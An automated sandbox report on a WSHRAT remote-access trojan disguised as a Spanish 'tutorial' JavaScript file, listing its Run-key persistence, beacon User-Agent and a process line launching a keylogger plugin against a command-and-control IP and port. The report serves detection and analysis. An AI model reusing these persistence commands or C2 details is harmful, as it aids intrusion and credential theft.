Analysis Overview
SHA256
beedfc01af698a1413c76a35899d15b1c940c824cdf96e406c668b193bc78229
Threat Level: Known bad
The file TUTORIAL CORREO ARMADA EN TELEFONO ANDROID.js was found to be: Known bad.
Malicious Activity Summary
Wshrat family
suricata: ET MALWARE WSHRAT Credential Dump Module Download Command Inbound
suricata: ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm Checkin 1
WSHRAT
WSHRAT Payload
suricata: ET MALWARE WSHRAT CnC Checkin
Blocklisted process makes network request
Sets service image path in registry
Executes dropped EXE
Drops startup file
Checks computer location settings
Looks up external IP address via web service
Adds Run key to start application
Drops file in Windows directory
Drops file in Program Files directory
Enumerates physical storage devices
Script User-Agent
Suspicious use of AdjustPrivilegeToken
Kills process with taskkill
Modifies data under HKEY_USERS
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Enumerates system info in registry
Suspicious use of WriteProcessMemory
Suspicious use of FindShellTrayWindow
Modifies registry class
Suspicious behavior: EnumeratesProcesses
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2022-02-01 15:38
Signatures
WSHRAT Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Wshrat family
Analysis: behavioral1
Detonation Overview
Submitted
2022-02-01 15:38
Reported
2022-02-01 15:39
Platform
win7-en-20211208
Max time network
21s
Command Line
Signatures
Processes
Network
Files
Analysis: behavioral2
Detonation Overview
Submitted
2022-02-01 15:38
Reported
2022-02-01 15:41
Platform
win10v2004-en-20220113
Max time kernel
153s
Max time network
163s
Command Line
Signatures
WSHRAT
WSHRAT Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
suricata: ET MALWARE WSHRAT CnC Checkin
suricata: ET MALWARE WSHRAT Credential Dump Module Download Command Inbound
suricata: ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm Checkin 1
Blocklisted process makes network request
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\kl-plugin.exe | N/A |
Sets service image path in registry
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\wscript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\wscript.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TUTORIAL CORREO ARMADA EN TELEFONO ANDROID.js | C:\Windows\system32\wscript.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TUTORIAL CORREO ARMADA EN TELEFONO ANDROID.js | C:\Windows\System32\wscript.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\software\microsoft\windows\currentversion\run | C:\Windows\System32\wscript.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\software\microsoft\windows\currentversion\run | C:\Windows\system32\wscript.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\TUTORIAL CORREO ARMADA EN TELEFONO ANDROID = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Roaming\\TUTORIAL CORREO ARMADA EN TELEFONO ANDROID.js\"" | C:\Windows\system32\wscript.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\software\microsoft\windows\currentversion\run | C:\Windows\System32\wscript.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\TUTORIAL CORREO ARMADA EN TELEFONO ANDROID = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Roaming\\TUTORIAL CORREO ARMADA EN TELEFONO ANDROID.js\"" | C:\Windows\System32\wscript.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Software\Microsoft\Windows\CurrentVersion\Run | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\TUTORIAL CORREO ARMADA EN TELEFONO ANDROID = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Roaming\\TUTORIAL CORREO ARMADA EN TELEFONO ANDROID.js\"" | C:\Windows\system32\wscript.exe | N/A |
| Key created | \REGISTRY\MACHINE\software\microsoft\windows\currentversion\run | C:\Windows\system32\wscript.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\TUTORIAL CORREO ARMADA EN TELEFONO ANDROID = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Roaming\\TUTORIAL CORREO ARMADA EN TELEFONO ANDROID.js\"" | C:\Windows\System32\wscript.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\41f68f3a-3433-4cf2-96d5-d6406155f2b8.tmp | C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\20220201153940.pma | C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\WindowsUpdate.log | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\SoftwareDistribution\DataStore\Logs\edb.chk | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\SoftwareDistribution\DataStore\Logs\edb.log | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\SoftwareDistribution\DataStore\DataStore.edb | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\SoftwareDistribution\DataStore\DataStore.jfm | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\SoftwareDistribution\ReportingEvents.log | C:\Windows\system32\svchost.exe | N/A |
Enumerates physical storage devices
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Script User-Agent
| Description | Indicator | Process | Target |
| HTTP User-Agent header | WSHRAT|5C0A896F|JDQPXOPR|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 1/2/2022|JavaScript-v2.0|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|5C0A896F|JDQPXOPR|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 1/2/2022|JavaScript-v2.0|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|5C0A896F|JDQPXOPR|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 1/2/2022|JavaScript-v2.0|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|5C0A896F|JDQPXOPR|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 1/2/2022|JavaScript-v2.0|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|5C0A896F|JDQPXOPR|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 1/2/2022|JavaScript-v2.0|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|5C0A896F|JDQPXOPR|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 1/2/2022|JavaScript-v2.0|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|5C0A896F|JDQPXOPR|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 1/2/2022|JavaScript-v2.0|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|5C0A896F|JDQPXOPR|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 1/2/2022|JavaScript-v2.0|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|5C0A896F|JDQPXOPR|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 1/2/2022|JavaScript-v2.0|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|5C0A896F|JDQPXOPR|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 1/2/2022|JavaScript-v2.0|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|5C0A896F|JDQPXOPR|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 1/2/2022|JavaScript-v2.0|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|5C0A896F|JDQPXOPR|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 1/2/2022|JavaScript-v2.0|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|5C0A896F|JDQPXOPR|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 1/2/2022|JavaScript-v2.0|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|5C0A896F|JDQPXOPR|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 1/2/2022|JavaScript-v2.0|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|5C0A896F|JDQPXOPR|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 1/2/2022|JavaScript-v2.0|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|5C0A896F|JDQPXOPR|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 1/2/2022|JavaScript-v2.0|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|5C0A896F|JDQPXOPR|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 1/2/2022|JavaScript-v2.0|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|5C0A896F|JDQPXOPR|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 1/2/2022|JavaScript-v2.0|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|5C0A896F|JDQPXOPR|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 1/2/2022|JavaScript-v2.0|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|5C0A896F|JDQPXOPR|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 1/2/2022|JavaScript-v2.0|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|5C0A896F|JDQPXOPR|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 1/2/2022|JavaScript-v2.0|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|5C0A896F|JDQPXOPR|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 1/2/2022|JavaScript-v2.0|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|5C0A896F|JDQPXOPR|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 1/2/2022|JavaScript-v2.0|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|5C0A896F|JDQPXOPR|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 1/2/2022|JavaScript-v2.0|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|5C0A896F|JDQPXOPR|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 1/2/2022|JavaScript-v2.0|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|5C0A896F|JDQPXOPR|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 1/2/2022|JavaScript-v2.0|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|5C0A896F|JDQPXOPR|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 1/2/2022|JavaScript-v2.0|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|5C0A896F|JDQPXOPR|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 1/2/2022|JavaScript-v2.0|NL:Netherlands | N/A | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeTcbPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeTcbPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeTcbPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeTcbPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeTcbPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\wscript.exe
wscript.exe "C:\Users\Admin\AppData\Local\Temp\TUTORIAL CORREO ARMADA EN TELEFONO ANDROID.js"
C:\Windows\System32\wscript.exe
"C:\Windows\System32\wscript.exe" //B "C:\Users\Admin\AppData\Roaming\TUTORIAL CORREO ARMADA EN TELEFONO ANDROID.js"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\AppData\Roaming\TUTORIAL CORREO ARMADA EN TELEFONO ANDROID.pdf
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0x40,0x104,0x7fff7a1d46f8,0x7fff7a1d4708,0x7fff7a1d4718
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c taskkill /F /IM kl-plugin.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM kl-plugin.exe
C:\Users\Admin\AppData\Roaming\kl-plugin.exe
"C:\Users\Admin\AppData\Roaming\kl-plugin.exe" 111.90.149.115 5200 "WSHRAT|5C0A896F|JDQPXOPR|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 1/2/2022|JavaScript-v2.0|NL:Netherlands" 1
C:\Windows\SysWOW64\fondue.exe
"C:\Windows\system32\fondue.exe" /enable-feature:NetFx3 /caller-name:mscoreei.dll
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2116,16449752899422592532,15703532662652733733,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1484 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2116,16449752899422592532,15703532662652733733,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2456 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2116,16449752899422592532,15703532662652733733,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2320 /prefetch:8
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\system32\FonDUE.EXE
"C:\Windows\sysnative\FonDUE.EXE" /enable-feature:NetFx3 /caller-name:mscoreei.dll
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,16449752899422592532,15703532662652733733,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2624 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,16449752899422592532,15703532662652733733,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2644 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,16449752899422592532,15703532662652733733,131072 --disable-gpu-compositing --lang=en-US --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5364 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2116,16449752899422592532,15703532662652733733,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5480 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,16449752899422592532,15703532662652733733,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6140 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,16449752899422592532,15703532662652733733,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6168 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=ppapi --field-trial-handle=2116,16449752899422592532,15703532662652733733,131072 --lang=en-US --device-scale-factor=1 --ppapi-antialiased-text-enabled=1 --ppapi-subpixel-rendering-setting=1 --mojo-platform-channel-handle=6668 /prefetch:6
C:\Windows\System32\WaaSMedicAgent.exe
C:\Windows\System32\WaaSMedicAgent.exe 82cd49c1df55af3c5f7efa41d1df8173 oKiVtAUHI0eiN+pErxxmDg.0.1.0.0.0
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
